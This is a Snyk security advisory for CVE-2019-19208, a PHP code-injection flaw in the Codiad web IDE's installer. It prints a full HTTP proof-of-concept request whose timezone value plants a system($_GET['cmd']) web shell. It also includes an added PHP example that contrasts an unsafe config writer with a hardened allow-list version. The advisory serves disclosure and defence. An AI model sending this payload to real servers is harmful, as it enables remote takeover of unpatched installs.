Arbitrary Code Execution Affecting codiad/codiad package, versions >=0.0.0
Snyk CVSS
- Attack Complexity: Low
- Confidentiality: High
- Integrity: High
- Availability: High
Threat Intelligence
- Exploit Maturity: Mature
- EPSS: 34.67% (98th percentile)
- Snyk ID SNYK-PHP-CODIADCODIAD-560364
- published 16 Mar 2020
- disclosed 16 Mar 2020
- credit Tobias Neitzel of usd AG
Introduced: 16 Mar 2020
CVE-2019-19208
How to fix?
There is no fixed version for codiad/codiad.
Overview
codiad/codiad is a web-based IDE framework with a small footprint and minimal requirements.
Affected versions of this package are vulnerable to Arbitrary Code Execution through PHP code injection: user-supplied installer input is written into PHP code without sanitisation, as the proof of concept below demonstrates via the timezone parameter of components/install/process.php.
PoC by Tobias Neitzel
POST /components/install/process.php HTTP/1.1
Host: codiad.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 170
path=/var/www/html/data&username=/tmp/dada&password=/tmp/dada&project_name=/tmp/dada&project_path=/var/www/html/data/data&timezone='")%3b+system($_GET["cmd"])%3b+print("'
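The payload above works because a value that contains a closing quote and a semicolon breaks out of the string literal the installer is writing and becomes live PHP. The following is an added example, not Codiad's code: a hypothetical configuration writer in the style the PoC implies (the exact template Codiad uses is not shown on this page and is assumed), placed beside a hardened version that only accepts known timezone identifiers and serialises the value with var_export so it can never alter the surrounding PHP syntax.

```php
<?php
// Added example; not part of the Codiad project. The unsafe writer models the
// bug class behind CVE-2019-19208 (assumed template, not Codiad's actual file).

// Hypothetical unsafe writer: the user value is spliced straight into PHP
// source, so a quote followed by ';' ends the literal and the rest executes.
function write_config_unsafe(string $timezone): string
{
    return "<?php\ndefine('TIMEZONE', '" . $timezone . "');\n";
}

// Hardened writer: allow-list the value against PHP's own timezone table,
// then emit it with var_export so quotes and backslashes are escaped.
function write_config_safe(string $timezone): string
{
    if (!in_array($timezone, timezone_identifiers_list(), true)) {
        throw new InvalidArgumentException("unknown timezone: $timezone");
    }
    return "<?php\ndefine('TIMEZONE', " . var_export($timezone, true) . ");\n";
}

// Constructed inputs: a normal value and the shape of the advisory's payload.
$benign  = 'Europe/Berlin';
$hostile = "'); system(\$_GET['cmd']); print('";

echo "--- unsafe, benign input ---\n";
echo write_config_unsafe($benign);    // a valid config line

echo "--- unsafe, hostile input ---\n";
echo write_config_unsafe($hostile);   // the injected call is now PHP source

echo "--- safe, benign input ---\n";
echo write_config_safe($benign);      // define('TIMEZONE', 'Europe/Berlin');

echo "--- safe, hostile input ---\n";
try {
    write_config_safe($hostile);
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
```

Run it with `php example.php` and compare the two "unsafe" outputs: the hostile one contains a complete `system(...)` statement that will run the next time the generated file is included. The allow-list check is what closes the hole; var_export is defence in depth for the case where a future setting is free text rather than an enumerated value.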